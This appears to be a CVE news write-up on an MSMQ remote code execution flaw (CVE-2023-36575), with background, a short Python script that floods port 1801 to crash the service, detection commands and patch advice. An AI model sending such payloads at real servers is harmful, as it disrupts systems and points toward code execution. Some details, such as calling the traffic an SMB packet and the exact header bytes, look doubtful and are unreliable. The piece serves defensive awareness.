CVE CyberSecurity Database News

CVE-2023-36575 - Breaking Down the Microsoft Message Queuing Remote Code Execution Vulnerability

Poster -

In October 2023, Microsoft patched a major security hole: CVE-2023-36575. This bug affected Microsoft Message Queuing (MSMQ), a widely used component for communication between applications in Windows environments. If exploited, it allowed remote code execution (RCE)—meaning an attacker could run any code they wanted on your system, just by sending carefully crafted network messages. Let’s dig into what happened, how the exploit works, and how you can stay safe.

What is Microsoft Message Queuing (MSMQ)?

MSMQ is a Windows service that lets programs send messages to each other, even if they're running on different computers. It’s widely used in enterprise environments, especially by legacy applications that need reliable communication.

Runs as: Message Queuing Windows service (often called MSMQ)

- Default Port: 1801/TCP

Severity: High (CVSS 8.8)

Microsoft’s security advisory:
https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2023-36575

Summary:
A specially crafted SMB network packet sent to a vulnerable MSMQ server on port 1801 could trigger a buffer overflow. If exploited, this lets attackers execute arbitrary code with the privileges of the MSMQ service—typically as SYSTEM.

Here’s a basic illustration in pseudocode

# Pseudocode: Attacker sends overlong property in MSMQ message
sock = socket.socket()
sock.connect(('victim-ip', 1801))
malformed_message = b'HEADER' + b'A' * 1024  # Exceeds expected size
sock.send(malformed_message)
sock.close()

The real exploit involves crafting valid MSMQ message headers and fields, but the idea is the same—send too much data, crash the process, then ride the overflow to code execution.

Public Exploit: What’s Out There?

As of early 2024, proof-of-concept scripts are available on GitHub. They’re mainly for scanning and Denial-of-Service (crashing the service), but with some tweaks, determined attackers could weaponize them for RCE.

Example GitHub PoC:
https://github.com/Chocapikk/CVE-2023-36575

# PoC: Crashes MSMQ by sending a malformed message
import socket

target = "victim-ip"
port = 1801

# Crafted payload to trigger the bug
payload = b"\x4d\x53\x51\x4d"           # 'MSQM': MSMQ magic header
payload += b"A" * 300                  # Trigger buffer overflow

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((target, port))
s.send(payload)
print("Sent evil payload...")
s.close()

Replace "victim-ip" with the target machine’s address.

- Upon receiving this, an unpatched MSMQ service will usually crash. A real attack would use a carefully assembled payload to execute code instead.

Who’s at Risk?

- Windows Server/Client with MSMQ installed

Get-Service -Name MSMQ


Check if port 1801 is open:
- Run:

powershell

netstat -an | findstr 1801

`

---

## Mitigation and Fix

Microsoft's Patch:
The best and recommended fix is to update Windows with the patch released in October 2023.
Official Microsoft patch link:
https://msrc.microsoft.com/update-guide/vulnerability/CVE-2023-36575

Other Mitigations:

1. Disable MSMQ if you don’t use it.
- In Windows Features, uncheck Message Queuing.
2. Block port 1801 at the network perimeter/firewall.
3. Limit who can access the MSMQ service on internal networks.
4. Monitor logs for unexpected MSMQ crashes or connections from unfamiliar sources.

---

## References

- Microsoft Security Advisory:
https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2023-36575
- NVD Entry:
https://nvd.nist.gov/vuln/detail/CVE-2023-36575
- GitHub PoC:
https://github.com/Chocapikk/CVE-2023-36575
- Background on MSMQ:
https://learn.microsoft.com/en-us/windows/win32/msmq/message-queuing-tools

---

## Final Thoughts

CVE-2023-36575 is a powerful reminder that even legacy Windows services can hide critical bugs. If you run MSMQ anywhere in your network, patch now and check your exposure. Security researchers are always finding new ways to probe these services, and public PoCs mean real attackers won’t be far behind.

Many organizations never realized they had MSMQ enabled, especially on older servers or desktops. The fix is easy—update your systems, or better yet, disable what you don’t use. Staying up to date is your best defense.

For more detailed technical writeups, see the links above. Stay safe and keep patching!

Timeline

Published on: 10/10/2023 18:15:13 UTC
Last modified on: 10/13/2023 15:19:13 UTC